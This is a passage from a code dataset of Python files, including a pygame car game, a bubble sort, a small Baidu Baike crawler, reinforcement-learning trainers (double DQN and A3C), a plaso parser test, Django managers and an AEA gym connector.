15\r\n if SPEED_cmd in control_list:\r\n self.speedUp()\r\n elif BRAKE_cmd in control_list:\r\n self.brakeDown()\r\n else:\r\n self.slowDown()\r\n\r\nclass ComputerCar(Car):\r\n\r\n def __init__(self, y,distance,x):\r\n Car.__init__(self,y,distance)\r\n self.image_list = [pygame.transform.scale(pygame.image.load(\r\n path.join(IMAGE_DIR, COMPUTER_CAR_IMAGE[0])), car_size),pygame.transform.scale(pygame.image.load(\r\n path.join(IMAGE_DIR, COMPUTER_CAR_IMAGE[1])), (32,40))]\r\n self.image = self.image_list[0]\r\n self.rect.left,self.rect.top = (x,y)\r\n self.image = self.image.convert_alpha()\r\n self.velocity = random.randint(8,12)\r\n self.car_no = random.randrange(101, 200)\r\n self.distance = distance\r\n self.action = None\r\n\r\n def update(self,cars):\r\n if self.status:\r\n for car in cars:\r\n self.detect_other_cars(car)\r\n if self.action == \"stop\":\r\n self.brakeDown()\r\n break\r\n elif self.action == \"continue\":\r\n self.speedUp()\r\n else:\r\n pass\r\n self.distance += self.velocity\r\n if self.velocity < 0:\r\n self.velocity = 0\r\n if self.velocity > self.max_vel:\r\n self.velocity = self.max_vel\r\n pass\r\n else:\r\n pass\r\n self.keep_in_screen()\r\n\r\n def detect_other_cars(self, car):\r\n if abs(self.rect.centery - car.rect.centery) < 40:\r\n distance = car.rect.centerx - self.rect.centerx\r\n if 400 > distance > 0:\r\n self.action = \"stop\"\r\n else:\r\n self.action = \"continue\"\r\n\r\nclass Camera():\r\n def __init__(self):\r\n self.position = 500\r\n self.velocity = 0\r\n\r\n def update(self,car_velocity):\r\n self.revise_velocity(car_velocity)\r\n self.position += self.velocity\r\n\r\n def revise_velocity(self,car_velocity):\r\n if car_velocity >= 13:\r\n self.velocity = car_velocity-0.5\r\n\r\n elif car_velocity == 0:\r\n self.velocity = 1\r\n else:\r\n if self.velocity < car_velocity:\r\n self.velocity += 0.05\r\n elif self.velocity > car_velocity+1:\r\n self.velocity -= 0.05\r\n else:\r\n pass","sub_path":"game/car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":5377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"310500732","text":"\r\ndef bubbleSort(arr):\r\n\tn = len(arr)\r\n\r\n \r\n\tfor i in range(n-1):\r\n\t\r\n\t\tfor j in range(0, n-i-1):\r\n\r\n\t\t\tif arr[j] > arr[j+1] :\r\n\t\t\t\tarr[j], arr[j+1] = arr[j+1], arr[j]\r\n\r\nn = int(input(\"enter the size of list=\"))\r\narr=[]\r\nfor i in range(n):\r\n x=int(input(\"enter item=\"))\r\n arr.append(x)\r\n\r\nbubbleSort(arr)\r\n\r\nprint (\"Sorted array list is:\")\r\nfor i in range(len(arr)):\r\n\tprint (\"%d\" %arr[i]),\r\n","sub_path":"python_special/bubble.py","file_name":"bubble.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"457591402","text":"# coding:utf8\nfrom baidu_baike import html_downloader\nfrom baidu_baike import html_outputer\nfrom baidu_baike import url_manager\nfrom baidu_baike import html_parser\n\n\nclass BaikeMain(object):\n def __init__(self):\n self.urls = url_manager.UrlManager()\n self.downloader = html_downloader.HtmlDownload()\n self.parser = html_parser.HtmlParser()\n self.outputer = html_outputer.HtmlOutputer()\n\n def craw(self, root_url):\n count = 1\n self.urls.add_new_url(root_url)\n while self.urls.has_new_url():\n try:\n new_url = self.urls.get_new_url()\n print(\"正在爬取第 %d 页面:%s\" % (count, new_url))\n html_content = self.downloader.download(new_url)\n new_urls, new_data = 
self.parser.parse(new_url, html_content)\n                self.urls.add_new_urls(new_urls)\n                self.outputer.collect_data(new_data)\n                if count == 10:\n                    break\n                count += 1\n            except:\n                print(\"爬取页面失败!\")\n\n        print(\"\\n页面爬取结束!\")\n        self.outputer.output_html()\n\n\nif __name__ == \"__main__\":\n    root_url = \"http://baike.baidu.com/item/Python\"\n    baike_main = BaikeMain()\n    baike_main.craw(root_url)\n","sub_path":"baidu_baike/baike_main.py","file_name":"baike_main.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"371776234","text":"import argparse\nimport logging\n\nlog_format = '[%(asctime)s][%(levelname)8s]: %(message)s'\ndate_format = '%I:%M:%S%p'\n\n# formatter = logging.Formatter(fmt=log_format,\n#                               datefmt=date_format)\n\nlogging.basicConfig(level=logging.DEBUG,\n                    format=log_format,\n                    datefmt=date_format)\n\n\nclass FindSecondComponent(object):\n\n    def __init__(self):\n        self.log = logging.getLogger(__name__)\n        self.args = None\n        self.target_list = None\n        self.template_list = None\n        self.first_component = None\n\n    def __call__(self, *args, **kwargs):\n        self.log.info(\"hello! this is a log message\")\n        self.args = self._get_args()\n        print(self.args)\n\n    def spbina(self):\n        pass\n\n    @staticmethod\n    def _get_args(arguments=None):\n        parser = argparse.ArgumentParser(\n            description=\"Finds secondary component of binary stars\")\n\n        # parser.add_argument('--debug',\n        #                     action='store_true',\n        #                     dest='debug_mode',\n        #                     help='Run in debug mode')\n\n        parser.add_argument('--file-list',\n                            action='store',\n                            type=str,\n                            dest='file_list',\n                            help='List of Observed spectra')\n\n        parser.add_argument('--template-list',\n                            action='store',\n                            type=str,\n                            dest='template_list',\n                            help='List of Templates')\n\n        parser.add_argument('--primary',\n                            action='store',\n                            default='A',\n                            type=str,\n                            dest='primary_output_file',\n                            help='Output name for primary component spectrum')\n\n        parser.add_argument('--secondary',\n                            action='store',\n                            default='B',\n                            type=str,\n                            dest='secondary_output_file',\n                            help='Output name for secondary component spectrum')\n\n        parser.add_argument('--vo',\n                            action='store',\n                            default=25,\n                            type=float,\n                            dest='vo',\n                            help='vgamma')\n\n        parser.add_argument('--min-mass-ratio',\n                            action='store',\n                            default=0.02,\n                            type=float,\n                            dest='min_mass_ratio',\n                            help='Minimum mass ratio')\n\n        parser.add_argument('--max-mass-ratio',\n                            action='store',\n                            default=0.5,\n                            type=float,\n                            dest='max_mass_ratio',\n                            help='Maximum mass ratio')\n\n        parser.add_argument('--mass-ratio-step',\n                            action='store',\n                            default=0.01,\n                            type=float,\n                            dest='mass_ratio_step',\n                            help='Mass ratio step')\n\n        parser.add_argument('--sam',\n                            action='store',\n                            default='*',\n                            type=str,\n                            dest='sam',\n                            help='Spectral regions')\n\n        args = parser.parse_args(args=arguments)\n\n        return args\n\n\nif __name__ == '__main__':\n    find2c = FindSecondComponent()\n    find2c()\n\n","sub_path":"find2c/find2c.py","file_name":"find2c.py","file_ext":"py","file_size_in_byte":3694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"301278259","text":"##\n## Build a table containing _c1 and a ':'-separated\n## list of the values of column _c2\n## for the file tbl0.tsv\n## \nimport pandas as pd\ndata=pd.read_csv('tbl0.tsv',delimiter='\\t', encoding='utf-8')\nc1=data['_c1']\nc2=data['_c2']\ndict_data={}\n\nfor i,j in zip(c1,c2):\n    if i in dict_data:\n        dict_data[i].append(j)\n    else:\n        dict_data[i]=[j]\n    
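# Note: the loop above and the join logic below are a hand-rolled group-by; a sketch of the same result with pandas built-ins (assuming the same '_c1'/'_c2' columns) would be:\n#   df = data.groupby('_c1')['_c2'].apply(lambda s: ':'.join(str(v) for v in sorted(s))).reset_index()\n#   df.columns = ['_c0', 'lista']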
\nlabel=sorted(dict_data)\n\narreglo=[]\nfor i in label:\n var=sorted(dict_data[i])\n value=str(var[0])\n for j in range(1,len(var)):\n value+=':%s'%str(var[j])\n arreglo.append(value)\n\nresult=[]\n\nfor i,j in zip (label,arreglo):\n result.append([i,j])\n\ndf=pd.DataFrame(result, columns = ['_c0', 'lista'])\n\nprint(df)\n \n","sub_path":"q09.py","file_name":"q09.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"211598307","text":"import numpy as np\nimport tensorflow as tf\nimport pandas as pd\n\nfrom neural_net import DoubleQNetwork\nfrom buffer import experience_buffer\n#import tf.layers.{dense, conv2d\nimport os\n\n\ndef processState(states, img_shape):\n return np.reshape(states, [img_shape[0] * img_shape[1] * img_shape[2]])\n\ndef update_target_graph(tfVars, tau):\n total_vars = len(tfVars)\n op_holder = []\n for idx, var in enumerate(tfVars[0: total_vars // 2]):\n op_holder.append(tfVars[idx + total_vars // 2].assign(\\\n (var.value()*tau) + ((1-tau)*tfVars[idx+total_vars//2].value())))\n return op_holder\n\ndef update_target(op_holder, sess):\n for op in op_holder:\n sess.run(op)\n\n\ndef train_double_dqn(env, img_shape, batch_size=32, update_freq=4, y=0.99,\n startE=0.7, endE=0.95, annealing_steps=1000,\n num_episodes=10000, max_ep_length=50,\n pre_train_steps=10, checkpoint=50,\n load_model=False, save_path='models/ddqn/',\n lr=0.0001, h_size=64, out_size=64, render=False,\n verbosity=20, tau=0.001):\n tf.reset_default_graph()\n # img_shape = 250, 160, 3\n mainQN = DoubleQNetwork(env, 'main', img_shape, h_size, out_size, lr)\n targetQN = DoubleQNetwork(env, 'target', img_shape, h_size, out_size, lr)\n\n init = tf.global_variables_initializer()\n saver = tf.train.Saver()\n\n trainables = tf.trainable_variables()\n target_ops = update_target_graph(trainables, tau)\n my_buffer = experience_buffer()\n\n e = startE\n step_drop = (endE - startE) / annealing_steps\n\n jList, rList, total_steps = [], [], 0\n\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n\n with tf.Session() as sess:\n sess.run(init)\n if load_model:\n print('Loading model...')\n ckpt = tf.train.get_checkpoint_state(save_path)\n saver.restore(sess, ckpt.model_checkpoint_path)\n\n # pretraining steps: random actions\n print('Performing random pretraining steps...')\n for i in range(pre_train_steps):\n episode_buffer = experience_buffer()\n s = env.reset()\n # s = s.reshape((-1, img_shape[0], img_shape[1], img_shape[2]))\n j = 0\n while j < max_ep_length:\n j+=1\n a = np.random.randint(0, env.action_space.n)\n\n s, _, _, _ = env.step(a)\n s1, r, d, info = env.step(a)\n # s1 = s1.reshape((-1, img_shape[0], img_shape[1], img_shape[2]))\n episode_buffer.add(np.reshape(np.array([s, a, r, s1, d]), [1, 5]))\n s = s1\n\n if d:\n break\n\n my_buffer.add(episode_buffer.buffer )\n print('Random steps done\\n Begin training...')\n\n for i in range(num_episodes):\n if e < endE:\n e += step_drop\n\n episode_buffer = experience_buffer()\n s = env.reset()\n # s = s.reshape((-1, img_shape[0], img_shape[1], img_shape[2]))\n rAll, j = 0, 0\n while j < max_ep_length:\n j +=1\n\n if np.random.rand(1)[0] > e:\n a = np.random.randint(0, env.action_space.n)\n else:\n s0 = s.reshape((-1, img_shape[0], img_shape[1], img_shape[2]))\n a = sess.run(mainQN.predict, feed_dict={mainQN.X: s0})[0]\n\n s1, r, d, info = env.step(a)\n total_steps +=1\n episode_buffer.add(np.reshape(np.array([s, a, r, s1, d]), [1, 5]))\n s = s1#.reshape((-1, 
img_shape[0], img_shape[1], img_shape[2]))\n\n                if render:\n                    env.render()\n\n                if total_steps % (update_freq) == 0:\n                    train_batch = my_buffer.sample(batch_size)\n\n                    states = np.vstack(train_batch[:, 3]).reshape(\n                        (batch_size, img_shape[0],\n                         img_shape[1], img_shape[2]))\n                    Q1 = sess.run(mainQN.predict,\n                                  feed_dict={mainQN.X: states})\n                    Q2 = sess.run(targetQN.Qout, #targetQN\n                                  feed_dict={targetQN.X: states})\n                    end_multiplier = -(train_batch[:, 4] - 1)\n                    doubleQ = Q2[range(batch_size), Q1]\n                    targetQ = train_batch[:, 2] + (\n                            y * doubleQ * end_multiplier)\n\n                    old_states = np.vstack(train_batch[:, 0]).reshape(\n                        (batch_size, img_shape[0],\n                         img_shape[1], img_shape[2]))\n                    _, loss = sess.run([mainQN.update_model, mainQN.loss],\n                                       feed_dict= \\\n                                           {mainQN.X: old_states,\n                                            mainQN.targetQ: targetQ,\n                                            mainQN.actions: train_batch[:, 1]})\n                    if total_steps % (verbosity*5) == 0:\n                        print('Total step {} loss={:.3}'.format(total_steps, loss))\n                        # print('Step {} on iter {}: need to update the main model '\n                        #       'with loss={:.3f}'.format(j, i, loss))\n\n                    # update_target(target_ops, sess)\n                rAll+=r\n                if d:\n                    print('Arriving on terminal state in iteration {}'.format(i))\n                    break\n\n            print('Episode terminated in {} steps --- current e:{}'.format(j, e))\n            my_buffer.add(episode_buffer.buffer)\n            jList.append(j)\n            rList.append(rAll)\n            print('Reward of iteration {}: {:.3f}\\n'.format(i, rAll))\n            if i % verbosity == 0:\n                print('On iteration {} mean return={:.3f} ---- total '\n                      'steps:{}'.format(i, sum(rList)/(i+1), total_steps))\n            if (i+1)%checkpoint == 0:\n                path = saver.save(sess, save_path)\n                print('Model saved in path: {}'.format(path))\n    df = pd.DataFrame([jList, rList], index=['j', 'reward']).T\n    df.to_csv('models/ddqn/rewards.csv', sep=';')\n    return jList, rList, num_episodes\n\n\n\n\n\n\n\n\n","sub_path":"dueling_dqn.py","file_name":"dueling_dqn.py","file_ext":"py","file_size_in_byte":6315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"174447122","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"Tests for the OLE Compound File (OLECF) default plugin.\"\"\"\n\nfrom __future__ import unicode_literals\n\nimport unittest\n\nfrom plaso.lib import definitions\nfrom plaso.parsers.olecf_plugins import default\n\nfrom tests.parsers.olecf_plugins import test_lib\n\n\nclass TestDefaultPluginOLECF(test_lib.OLECFPluginTestCase):\n  \"\"\"Tests for the OLECF default plugin.\"\"\"\n\n  def testProcess(self):\n    \"\"\"Tests the Process function.\"\"\"\n    plugin = default.DefaultOLECFPlugin()\n    storage_writer = self._ParseOLECFFileWithPlugin(['Document.doc'], plugin)\n\n    self.assertEqual(storage_writer.number_of_warnings, 0)\n    self.assertEqual(storage_writer.number_of_events, 5)\n\n    events = list(storage_writer.GetEvents())\n\n    # Check the Root Entry event.\n    event = events[0]\n\n    self.CheckTimestamp(event.timestamp, '2013-05-16 02:29:49.795000')\n    self.assertEqual(\n        event.timestamp_desc, definitions.TIME_DESCRIPTION_MODIFICATION)\n\n    event_data = self._GetEventDataOfEvent(storage_writer, event)\n    self.assertEqual(event_data.name, 'Root Entry')\n\n    expected_string = (\n        'Name: Root Entry')\n\n    self._TestGetMessageStrings(\n        event_data, expected_string, expected_string)\n\n    # Check one other entry.\n    event = events[1]\n\n    self.CheckTimestamp(event.timestamp, '2013-05-16 02:29:49.704000')\n\n    event_data = self._GetEventDataOfEvent(storage_writer, event)\n\n    expected_string = 'Name: MsoDataStore'\n    self._TestGetMessageStrings(\n        event_data, expected_string, 
expected_string)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/parsers/olecf_plugins/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"429723378","text":"import datetime\r\n\r\nfrom django.db import models\r\nfrom django.db.models import Q\r\nfrom django.core.cache import cache\r\n\r\n\r\nclass ShowManager(models.Manager):\r\n\r\n def shows_for_display(self, type_show=None):\r\n Q1 = Q(raiting_average=None)\r\n Q2 = Q(rus_fields=None)\r\n Q3 = Q(premired=None)\r\n Q4 = Q(image_medium_url=None)\r\n Q5 = Q(image_original_url=None)\r\n\r\n shows = self.exclude(Q2 | Q3).order_by('-premired').exclude(Q4 & Q5)\r\n if type_show == 'anime':\r\n shows = shows.filter(genres=14)\r\n elif type_show == 'shows':\r\n shows = shows.filter(type_show='Scripted')\r\n\r\n elif type_show == 'cartoons':\r\n shows = shows.filter(type_show='Animation').exclude(genres=14)\r\n rus_objects = cache.get('rus_objects')\r\n return shows.filter(rus_fields__in=cache.get('rus_objects'))\r\n\r\n def search_form(self, value):\r\n Q1 = Q(name__icontains=value)\r\n\r\n shows = self.filter(Q1)[:10]\r\n if not shows:\r\n return shows\r\n dict_shows = list()\r\n\r\n for data in shows:\r\n try:\r\n\r\n dict_shows.append([data.name, data.rus_fields.name, data.premired, data.image_original_url,\r\n data.get_absolute_url()])\r\n\r\n except ValueError:\r\n continue\r\n print(dict_shows)\r\n return dict_shows\r\n\r\n\r\nclass RusFeldsManager(models.Manager):\r\n\r\n def search_form(self, value):\r\n Q1 = Q(name__icontains=value)\r\n\r\n shows_rus = self.filter(Q1)[:10]\r\n if not shows_rus:\r\n return shows_rus\r\n dict_shows = list()\r\n\r\n for data in shows_rus:\r\n try:\r\n data.show\r\n dict_shows.append([data.name, data.show.name, data.show.premired, data.show.image_original_url,\r\n data.show.get_absolute_url()])\r\n except:\r\n continue\r\n print(dict_shows)\r\n return dict_shows\r\n\r\n def search_rus_names(self):\r\n return self.filter(name__regex='[а-яА-Я]')\r\n\r\n\r\nclass EpisodeManager(models.Manager):\r\n\r\n def filter_episodes(self):\r\n print('Hello')\r\n\r\n return self.filter(airdate__gt=datetime.datetime.now()).order_by('airdate')[:20]\r\n","sub_path":"show_app/models_manager.py","file_name":"models_manager.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"172557192","text":"from __future__ import print_function\n\nimport argparse\nimport os\n\nimport torch\nimport torch.nn as nn\nimport torch.multiprocessing as mp\n\nimport my_optim\nfrom envs import create_atari_env\nfrom model import ActorCritic\nfrom test import test\nfrom train import train\nfrom torch.nn.init import xavier_uniform_ as Xavier\n\n# Based on\n# https://github.com/pytorch/examples/tree/master/mnist_hogwild\n# Training settings\nparser = argparse.ArgumentParser(description='A3C')\nparser.add_argument('--lr', type=float, default=0.0001,\n help='learning rate (default: 0.0001)')\nparser.add_argument('--gamma', type=float, default=0.99,\n help='discount factor for rewards (default: 0.99)')\nparser.add_argument('--tau', type=float, default=1.00,\n help='parameter for GAE (default: 1.00)')\nparser.add_argument('--entropy-coef', type=float, default=0.01,\n help='entropy term coefficient (default: 0.01)')\nparser.add_argument('--value-loss-coef', type=float, default=0.5,\n help='value loss 
coefficient (default: 0.5)')\nparser.add_argument('--max-grad-norm', type=float, default=50,\n                    help='value loss coefficient (default: 50)')\nparser.add_argument('--seed', type=int, default=1,\n                    help='random seed (default: 1)')\nparser.add_argument('--num-processes', type=int, default=4,\n                    help='how many training processes to use (default: 4)')\nparser.add_argument('--num-steps', type=int, default=20,\n                    help='number of forward steps in A3C (default: 20)')\nparser.add_argument('--max-episode-length', type=int, default=1000000,\n                    help='maximum length of an episode (default: 1000000)')\nparser.add_argument('--env-name', default='PongDeterministic-v4',\n                    help='environment to train on (default: PongDeterministic-v4)')\nparser.add_argument('--no-shared', default=False,\n                    help='use an optimizer without shared momentum.')\nparser.add_argument('--tag', required=True,\n                    help='tag for current experiment')\nparser.add_argument('--transfer-env', required=True,\n                    help='env model to use for initializing the network')\nparser.add_argument('--transfer-tag', required=True,\n                    help='tag for transfer env model')\n\n\nif __name__ == '__main__':\n    os.environ['OMP_NUM_THREADS'] = '1'\n    os.environ['CUDA_VISIBLE_DEVICES'] = \"\"\n\n    args = parser.parse_args()\n\n    torch.manual_seed(args.seed)\n\n    transfer_env = create_atari_env(args.transfer_env)\n    transfer_env_model = ActorCritic(\n        transfer_env.observation_space.shape[0], transfer_env.action_space\n    )\n\n    checkpoint = torch.load('./checkpoints/{}_{}.tar'.format(args.transfer_env, args.transfer_tag))\n\n    try:\n        transfer_env_model.load_state_dict(checkpoint['model'])\n    except Exception:\n        transfer_env_model.load_state_dict(checkpoint['shared_model'])\n\n    transfer_env_model.train()\n\n    env = create_atari_env(args.env_name)\n\n    # shared_model = nn.Sequential(*list(transfer_env_model.children())[:-1])\n    # shared_model.add_module('actor_linear', nn.Linear(256, env.action_space.n))\n\n    shared_model = transfer_env_model\n    shared_model.actor_linear = nn.Linear(256, env.action_space.n)\n    shared_model.share_memory()\n\n    tag = args.tag\n\n    if tag == 'all_train':\n        from configs.all_train import Config\n    elif tag == 'train_conv4':\n        from configs.train_conv4 import Config\n    elif tag == 'reset_conv4_lstm_fc':\n        from configs.reset_conv4_lstm_fc import Config\n    elif tag == 'reset_lstm_fc':\n        from configs.reset_lstm_fc import Config\n    elif tag == 'reset_fc':\n        from configs.reset_fc import Config\n    else:\n        raise ValueError('Invalid config')\n    \n    config = Config()\n\n    # Freeze layers based on config values\n    for parameter in shared_model.conv1.parameters():\n        print('Retraining Conv1')\n        parameter.requires_grad = config.conv1_train\n    \n    for parameter in shared_model.conv2.parameters():\n        print('Retraining Conv2')\n        parameter.requires_grad = config.conv2_train\n    \n    for parameter in shared_model.conv3.parameters():\n        print('Retraining Conv3')\n        parameter.requires_grad = config.conv3_train\n    \n    for parameter in shared_model.conv4.parameters():\n        print('Retraining Conv4')\n        parameter.requires_grad = config.conv4_train\n    \n    for parameter in shared_model.lstm.parameters():\n        print('Retraining LSTM')\n        parameter.requires_grad = config.lstm_train\n    \n    for parameter in shared_model.critic_linear.parameters():\n        print('Retraining Critic Linear') \n        parameter.requires_grad = config.critic_linear_train\n    \n    for parameter in shared_model.actor_linear.parameters():\n        print('Retraining Actor Linear')\n        parameter.requires_grad = config.actor_linear_train\n\n\n    if(config.conv1_reset==True):\n        print('Resetting 
Conv1')\n Xavier(shared_model.conv1.weight)\n shared_model.conv1.bias.data.fill_(0.01)\n\n if(config.conv2_reset==True):\n print('Resetting Conv2')\n Xavier(shared_model.conv2.weight)\n shared_model.conv2.bias.data.fill_(0.01)\n\n if(config.conv3_reset==True):\n print('Resetting Conv3')\n Xavier(shared_model.conv3.weight)\n shared_model.conv3.bias.data.fill_(0.01)\n\n if(config.conv4_reset==True):\n print('Resetting Conv4') \n Xavier(shared_model.conv4.weight)\n shared_model.conv4.bias.data.fill_(0.01)\n\n if(config.lstm_reset==True):\n print('Resetting LSTM')\n #Xavier(shared_model.lstm.weight)\n #shared_model.lstm.bias.data.fill_(0.01)\n for name, param in shared_model.lstm.named_parameters():\n if 'bias' in name:\n nn.init.constant_(param, 0.0)\n elif 'weight' in name:\n nn.init.xavier_normal_(param)\n \n if(config.critic_linear_reset==True):\n print('Resetting Critic Linear')\n Xavier(shared_model.critic_linear.weight)\n shared_model.critic_linear.bias.data.fill_(0.01)\n\n if(config.actor_linear_reset==True):\n print('Resetting Actor Linear')\n Xavier(shared_model.actor_linear.weight)\n shared_model.actor_linear.bias.data.fill_(0.01)\n \n\n if args.no_shared:\n optimizer = None\n else:\n optimizer = my_optim.SharedAdam(filter(lambda p: p.requires_grad, shared_model.parameters()), lr=args.lr)\n optimizer.share_memory()\n\n processes = []\n\n counter = mp.Value('i', 0)\n lock = mp.Lock()\n\n p = mp.Process(target=test, args=(args.num_processes,\n args, shared_model, counter, optimizer))\n p.start()\n processes.append(p)\n\n for rank in range(0, args.num_processes):\n p = mp.Process(target=train, args=(\n rank, args, shared_model, counter, lock, optimizer))\n p.start()\n processes.append(p)\n for p in processes:\n p.join()\n","sub_path":"transfer_learning.py","file_name":"transfer_learning.py","file_ext":"py","file_size_in_byte":7025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"145872208","text":"# -*- coding: utf-8 -*-\n\n# ------------------------------------------------------------------------------\n#\n# Copyright 2018-2019 Fetch.AI Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# ------------------------------------------------------------------------------\n\n\"\"\"Gym connector and gym channel.\"\"\"\nimport asyncio\nimport logging\nimport sys\nimport threading\nfrom asyncio import CancelledError\nfrom typing import Dict, Optional, cast, TYPE_CHECKING\n\nimport gym\n\nfrom aea.configurations.base import ConnectionConfig\nfrom aea.connections.base import Connection\nfrom aea.helpers.base import locate\nfrom aea.mail.base import Envelope\n\nif TYPE_CHECKING or \"pytest\" in sys.modules:\n from packages.protocols.gym.message import GymMessage\n from packages.protocols.gym.serialization import GymSerializer\nelse:\n from gym_protocol.message import GymMessage\n from gym_protocol.serialization import GymSerializer\n\nlogger = logging.getLogger(__name__)\n\n\n\"\"\"default 'to' field for Gym 
envelopes.\"\"\"\nDEFAULT_GYM = \"gym\"\n\n\nclass GymChannel:\n \"\"\"A wrapper of the gym environment.\"\"\"\n\n def __init__(self, public_key: str, gym_env: gym.Env):\n \"\"\"Initialize a gym channel.\"\"\"\n self.public_key = public_key\n self.gym_env = gym_env\n self._lock = threading.Lock()\n\n self._queues = {} # type: Dict[str, asyncio.Queue]\n\n def connect(self) -> Optional[asyncio.Queue]:\n \"\"\"\n Connect a public key to the gym.\n\n :return: an asynchronous queue, that constitutes the communication channel.\n \"\"\"\n if self.public_key in self._queues:\n return None\n\n assert len(self._queues.keys()) == 0, \"Only one public key can register to a gym.\"\n q = asyncio.Queue() # type: asyncio.Queue\n self._queues[self.public_key] = q\n return q\n\n def send(self, envelope: Envelope) -> None:\n \"\"\"\n Process the envelopes to the gym.\n\n :return: None\n \"\"\"\n sender = envelope.sender\n logger.debug(\"Processing message from {}: {}\".format(sender, envelope))\n self._decode_envelope(envelope)\n\n def _decode_envelope(self, envelope: Envelope) -> None:\n \"\"\"\n Decode the envelope.\n\n :param envelope: the envelope\n :return: None\n \"\"\"\n if envelope.protocol_id == \"gym\":\n self.handle_gym_message(envelope)\n else:\n raise ValueError('This protocol is not valid for gym.')\n\n def handle_gym_message(self, envelope: Envelope) -> None:\n \"\"\"\n Forward a message to gym.\n\n :param envelope: the envelope\n :return: None\n \"\"\"\n gym_message = GymSerializer().decode(envelope.message)\n performative = gym_message.get(\"performative\")\n if GymMessage.Performative(performative) == GymMessage.Performative.ACT:\n action = gym_message.get(\"action\")\n step_id = gym_message.get(\"step_id\")\n observation, reward, done, info = self.gym_env.step(action) # type: ignore\n msg = GymMessage(performative=GymMessage.Performative.PERCEPT, observation=observation, reward=reward, done=done, info=info, step_id=step_id)\n msg_bytes = GymSerializer().encode(msg)\n envelope = Envelope(to=envelope.sender, sender=DEFAULT_GYM, protocol_id=GymMessage.protocol_id, message=msg_bytes)\n self._send(envelope)\n elif GymMessage.Performative(performative) == GymMessage.Performative.RESET:\n self.gym_env.reset() # type: ignore\n elif GymMessage.Performative(performative) == GymMessage.Performative.CLOSE:\n self.gym_env.close() # type: ignore\n\n def _send(self, envelope: Envelope) -> None:\n \"\"\"Send a message.\n\n :param envelope: the envelope\n :return: None\n \"\"\"\n destination = envelope.to\n self._queues[destination].put_nowait(envelope)\n\n def disconnect(self) -> None:\n \"\"\"\n Disconnect.\n\n :return: None\n \"\"\"\n with self._lock:\n self._queues.pop(self.public_key, None)\n\n\nclass GymConnection(Connection):\n \"\"\"Proxy to the functionality of the gym.\"\"\"\n\n restricted_to_protocols = {\"gym\"}\n\n def __init__(self, public_key: str, gym_env: gym.Env, connection_id: str = \"gym\", **kwargs):\n \"\"\"\n Initialize a connection to a local gym environment.\n\n :param public_key: the public key used in the protocols.\n :param gym_env: the gym environment.\n :param connection_id: the connection id.\n \"\"\"\n super().__init__(connection_id=connection_id, **kwargs)\n self.public_key = public_key\n self.channel = GymChannel(public_key, gym_env)\n\n self._connection = None # type: Optional[asyncio.Queue]\n\n async def connect(self) -> None:\n \"\"\"\n Connect to the gym.\n\n :return: None\n \"\"\"\n if not self.connection_status.is_connected:\n self.connection_status.is_connected = 
True\n self._connection = self.channel.connect()\n\n async def disconnect(self) -> None:\n \"\"\"\n Disconnect from the gym.\n\n :return: None\n \"\"\"\n if self.connection_status.is_connected:\n assert self._connection is not None\n self.connection_status.is_connected = False\n await self._connection.put(None)\n self.channel.disconnect()\n self._connection = None\n self.stop()\n\n async def send(self, envelope: Envelope) -> None:\n \"\"\"\n Send an envelope.\n\n :param envelope: the envelop\n :return: None\n \"\"\"\n if not self.connection_status.is_connected:\n raise ConnectionError(\"Connection not established yet. Please use 'connect()'.\")\n self.channel.send(envelope)\n\n async def receive(self, *args, **kwargs) -> Optional['Envelope']:\n \"\"\"Receive an envelope.\"\"\"\n if not self.connection_status.is_connected:\n raise ConnectionError(\"Connection not established yet. Please use 'connect()'.\")\n try:\n assert self._connection is not None\n envelope = await self._connection.get()\n if envelope is None:\n return None\n return envelope\n except CancelledError: # pragma: no cover\n return None\n\n def stop(self) -> None:\n \"\"\"\n Tear down the connection.\n\n :return: None\n \"\"\"\n self._connection = None\n\n @classmethod\n def from_config(cls, public_key: str, connection_configuration: ConnectionConfig) -> 'Connection':\n \"\"\"\n Get the Gym connection from the connection configuration.\n\n :param public_key: the public key of the agent.\n :param connection_configuration: the connection configuration object.\n :return: the connection object\n \"\"\"\n gym_env_package = cast(str, connection_configuration.config.get('env'))\n gym_env = locate(gym_env_package)\n return GymConnection(public_key, gym_env(),\n connection_id=connection_configuration.name,\n restricted_to_protocols=set(connection_configuration.restricted_to_protocols))\n","sub_path":"packages/connections/gym/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":7738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"444968420","text":"# -*- coding: utf-8 -*-\r\nfrom odoo import models, fields, api\r\nfrom odoo.tools.translate import _\r\nimport logging\r\n\r\nfrom odoo.addons import decimal_precision as dp\r\nfrom odoo import exceptions\r\n\r\n_logger = logging.getLogger(__name__)\r\n\r\nclass crm_sale_note(models.Model):\r\n _name = 'crm.sale.note'\r\n _inherit = 